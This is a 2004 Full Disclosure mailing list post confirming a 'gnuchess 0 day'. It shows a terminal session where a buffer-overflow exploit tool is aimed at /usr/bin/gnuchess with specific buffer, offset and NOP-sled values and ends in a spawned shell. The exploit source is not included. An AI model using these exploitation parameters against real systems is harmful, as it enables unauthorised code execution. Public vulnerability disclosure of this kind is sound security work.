Full Disclosure mailing list archives
re: gnuchess 0 day
From: Chris <chris () cr-secure net>
Date: Mon, 02 Feb 2004 18:14:16 -0500
hey what do ya know it works :-/ (slack 9.1) chris@localhost:/HDB/mycode/ex$ ./ex_bof Please enter the values as requested . . . Enter the vulnerable program path: /usr/bin/gnuchess Enter the vulnerable program name: gnuchess Enter any arguments the program requires: -s Enter an offset: 0 Enter a buffer size: 900 Enter the nop sled size: 400 The Return Value Is: 0xbffff898 Injecting Shellcode . . . sh-2.05b$ www.cr-secure.net _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- re: gnuchess 0 day Chris (Feb 02)
- <Possible follow-ups>
- RE: re: gnuchess 0 day first last (Feb 02)